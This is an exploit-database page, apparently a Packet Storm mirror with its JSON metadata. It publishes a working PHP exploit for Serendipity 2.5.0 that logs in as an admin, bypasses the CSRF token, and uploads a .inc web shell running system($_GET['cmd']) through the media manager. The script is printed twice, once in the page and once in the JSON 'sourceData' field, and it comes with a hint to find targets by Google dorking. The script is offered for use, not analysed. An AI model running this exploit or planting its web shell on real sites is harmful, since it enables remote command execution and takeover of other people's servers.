📄 Serendipity 2.5.0 PHP Code Injection_PACKETSTORM:215868

Description

Serendipity version 2.5.0 proof of concept PHP code injection exploit...

Basic Information

ID PACKETSTORM:215868

Published Feb 19, 2026 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Serendipity 2.5.0 PHP COde Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://www.s9y.org/latest |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: Serendipity 2.5.0 - Remote Command Execution Exploit in PHP

(Related : https://packetstorm.news/files/id/178890/ Related CVE numbers: ) .

[+] save code as poc.php.

[+] Usage: php script.php <siteurl> <username> <password>

[+] PayLoad :

<?php
function generate_filename($extension = ".inc") {
$characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
$filename = '';
for ($i = 0; $i < 5; $i++) {
$filename .= $characters[rand(0, strlen($characters) - 1)];
}
return $filename . $extension;
}

function get_csrf_token($response) {
preg_match('/<input.*name="serendipity\[token\]".*value="(.*?)"/', $response, $matches);
return $matches[1] ?? null;
}

function login($base_url, $username, $password) {
echo "Logging in...\n";
sleep(2);

$session = curl_init();
curl_setopt($session, CURLOPT_URL, $base_url . "/serendipity_admin.php");
curl_setopt($session, CURLOPT_RETURNTRANSFER, true);
$login_page = curl_exec($session);
$token = get_csrf_token($login_page);

$data = [
"serendipity[action]" => "admin",
"serendipity[user]" => $username,
"serendipity[pass]" => $password,
"submit" => "Login",
"serendipity[token]" => $token
];

$headers = [
"Content-Type: application/x-www-form-urlencoded",
"Referer: " . $base_url . "/serendipity_admin.php"
];

curl_setopt($session, CURLOPT_URL, $base_url . "/serendipity_admin.php");
curl_setopt($session, CURLOPT_POST, true);
curl_setopt($session, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($session, CURLOPT_HTTPHEADER, $headers);
$response = curl_exec($session);

if (strpos($response, "Add media") !== false) {
echo "Login Successful!\n";
sleep(2);
return $session;
} else {
echo "Login Failed!\n";
return null;
}
}

function upload_file($session, $base_url, $filename, $token) {
echo "Shell Preparing...\n";
sleep(2);

$boundary = "---------------------------395233558031804950903737832368";
$headers = [
"Content-Type: multipart/form-data; boundary=" . $boundary,
"Referer: " . $base_url . "/serendipity_admin.php?serendipity[adminModule]=media"
];

$payload = "--$boundary\r\n"
. "Content-Disposition: form-data; name=\"serendipity[token]\"\r\n\r\n"
. "$token\r\n"
. "--$boundary\r\n"
. "Content-Disposition: form-data; name=\"serendipity[action]\"\r\n\r\n"
. "admin\r\n"
. "--$boundary\r\n"
. "Content-Disposition: form-data; name=\"serendipity[adminModule]\"\r\n\r\n"
. "media\r\n"
. "--$boundary\r\n"
. "Content-Disposition: form-data; name=\"serendipity[adminAction]\"\r\n\r\n"
. "add\r\n"
. "--$boundary\r\n"
. "Content-Disposition: form-data; name=\"serendipity[userfile][1]\"; filename=\"$filename\"\r\n"
. "Content-Type: text/html\r\n\r\n"
. "<html>\n<body>\n<form method=\"GET\" name=\"<?php echo basename(\$_SERVER['PHP_SELF']); ?>\">\n"
. "<input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\">\n<input type=\"SUBMIT\" value=\"Execute\">\n"
. "</form>\n<pre>\n<?php\nif(isset(\$_GET['cmd']))\n{\nsystem(\$_GET['cmd']);\n}\n?>\n</pre>\n</body>\n</html>\r\n"
. "--$boundary--\r\n";

curl_setopt($session, CURLOPT_URL, $base_url . "/serendipity_admin.php?serendipity[adminModule]=media");
curl_setopt($session, CURLOPT_POST, true);
curl_setopt($session, CURLOPT_HTTPHEADER, $headers);
curl_setopt($session, CURLOPT_POSTFIELDS, $payload);
$response = curl_exec($session);

if (strpos($response, "File $filename successfully uploaded as") !== false) {
echo "Your shell is ready: " . $base_url . "/uploads/$filename\n";
} else {
echo "Exploit Failed!\n";
}
}

function main($base_url, $username, $password) {
$filename = generate_filename();
$session = login($base_url, $username, $password);
if ($session) {
$token = get_csrf_token(curl_exec($session));
upload_file($session, $base_url, $filename, $token);
}
}

if ($argc != 4) {
echo "Usage: php script.php <siteurl> <username> <password>\n";
} else {
main($argv[1], $argv[2], $argv[3]);
}
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2026-02-19T16:32:54",
    "description": "Serendipity version 2.5.0 proof of concept PHP code injection exploit...",
    "published": "2026-02-19T00:00:00",
    "modified": "2026-02-19T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Serendipity 2.5.0 PHP Code Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:215868",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Serendipity 2.5.0 PHP COde Injection Vulnerability                                                                          |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |\n    | # Vendor    : https://www.s9y.org/latest                                                                                                  |\n    =============================================================================================================================================\n    \n    POC :\n    \n    [+] Dorking \u0130n Google Or Other Search Enggine.\n    \n    [+] Code Description: Serendipity 2.5.0 - Remote Command Execution Exploit in PHP\n    \n       (Related : https://packetstorm.news/files/id/178890/ Related CVE numbers:  ) .\n    \t\n    [+] save code as poc.php.\n    \n    [+] Usage: php script.php <siteurl> <username> <password>\n    \n    [+] PayLoad :\n    \n    <?php\n    function generate_filename($extension = \".inc\") {\n        $characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';\n        $filename = '';\n        for ($i = 0; $i < 5; $i++) {\n            $filename .= $characters[rand(0, strlen($characters) - 1)];\n        }\n        return $filename . $extension;\n    }\n    \n    function get_csrf_token($response) {\n        preg_match('/<input.*name=\"serendipity\\[token\\]\".*value=\"(.*?)\"/', $response, $matches);\n        return $matches[1] ?? null;\n    }\n    \n    function login($base_url, $username, $password) {\n        echo \"Logging in...\\n\";\n        sleep(2);\n    \n        $session = curl_init();\n        curl_setopt($session, CURLOPT_URL, $base_url . \"/serendipity_admin.php\");\n        curl_setopt($session, CURLOPT_RETURNTRANSFER, true);\n        $login_page = curl_exec($session);\n        $token = get_csrf_token($login_page);\n    \n        $data = [\n            \"serendipity[action]\" => \"admin\",\n            \"serendipity[user]\" => $username,\n            \"serendipity[pass]\" => $password,\n            \"submit\" => \"Login\",\n            \"serendipity[token]\" => $token\n        ];\n    \n        $headers = [\n            \"Content-Type: application/x-www-form-urlencoded\",\n            \"Referer: \" . $base_url . \"/serendipity_admin.php\"\n        ];\n    \n        curl_setopt($session, CURLOPT_URL, $base_url . \"/serendipity_admin.php\");\n        curl_setopt($session, CURLOPT_POST, true);\n        curl_setopt($session, CURLOPT_POSTFIELDS, http_build_query($data));\n        curl_setopt($session, CURLOPT_HTTPHEADER, $headers);\n        $response = curl_exec($session);\n    \n        if (strpos($response, \"Add media\") !== false) {\n            echo \"Login Successful!\\n\";\n            sleep(2);\n            return $session;\n        } else {\n            echo \"Login Failed!\\n\";\n            return null;\n        }\n    }\n    \n    function upload_file($session, $base_url, $filename, $token) {\n        echo \"Shell Preparing...\\n\";\n        sleep(2);\n    \n        $boundary = \"---------------------------395233558031804950903737832368\";\n        $headers = [\n            \"Content-Type: multipart/form-data; boundary=\" . $boundary,\n            \"Referer: \" . $base_url . \"/serendipity_admin.php?serendipity[adminModule]=media\"\n        ];\n    \n        $payload = \"--$boundary\\r\\n\"\n            . \"Content-Disposition: form-data; name=\\\"serendipity[token]\\\"\\r\\n\\r\\n\"\n            . \"$token\\r\\n\"\n            . \"--$boundary\\r\\n\"\n            . \"Content-Disposition: form-data; name=\\\"serendipity[action]\\\"\\r\\n\\r\\n\"\n            . \"admin\\r\\n\"\n            . \"--$boundary\\r\\n\"\n            . \"Content-Disposition: form-data; name=\\\"serendipity[adminModule]\\\"\\r\\n\\r\\n\"\n            . \"media\\r\\n\"\n            . \"--$boundary\\r\\n\"\n            . \"Content-Disposition: form-data; name=\\\"serendipity[adminAction]\\\"\\r\\n\\r\\n\"\n            . \"add\\r\\n\"\n            . \"--$boundary\\r\\n\"\n            . \"Content-Disposition: form-data; name=\\\"serendipity[userfile][1]\\\"; filename=\\\"$filename\\\"\\r\\n\"\n            . \"Content-Type: text/html\\r\\n\\r\\n\"\n            . \"<html>\\n<body>\\n<form method=\\\"GET\\\" name=\\\"<?php echo basename(\\$_SERVER['PHP_SELF']); ?>\\\">\\n\"\n            . \"<input type=\\\"TEXT\\\" name=\\\"cmd\\\" autofocus id=\\\"cmd\\\" size=\\\"80\\\">\\n<input type=\\\"SUBMIT\\\" value=\\\"Execute\\\">\\n\"\n            . \"</form>\\n<pre>\\n<?php\\nif(isset(\\$_GET['cmd']))\\n{\\nsystem(\\$_GET['cmd']);\\n}\\n?>\\n</pre>\\n</body>\\n</html>\\r\\n\"\n            . \"--$boundary--\\r\\n\";\n    \n        curl_setopt($session, CURLOPT_URL, $base_url . \"/serendipity_admin.php?serendipity[adminModule]=media\");\n        curl_setopt($session, CURLOPT_POST, true);\n        curl_setopt($session, CURLOPT_HTTPHEADER, $headers);\n        curl_setopt($session, CURLOPT_POSTFIELDS, $payload);\n        $response = curl_exec($session);\n    \n        if (strpos($response, \"File $filename successfully uploaded as\") !== false) {\n            echo \"Your shell is ready: \" . $base_url . \"/uploads/$filename\\n\";\n        } else {\n            echo \"Exploit Failed!\\n\";\n        }\n    }\n    \n    function main($base_url, $username, $password) {\n        $filename = generate_filename();\n        $session = login($base_url, $username, $password);\n        if ($session) {\n            $token = get_csrf_token(curl_exec($session));\n            upload_file($session, $base_url, $filename, $token);\n        }\n    }\n    \n    if ($argc != 4) {\n        echo \"Usage: php script.php <siteurl> <username> <password>\\n\";\n    } else {\n        main($argv[1], $argv[2], $argv[3]);\n    }\n    ?>\n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/215868",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/215868/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply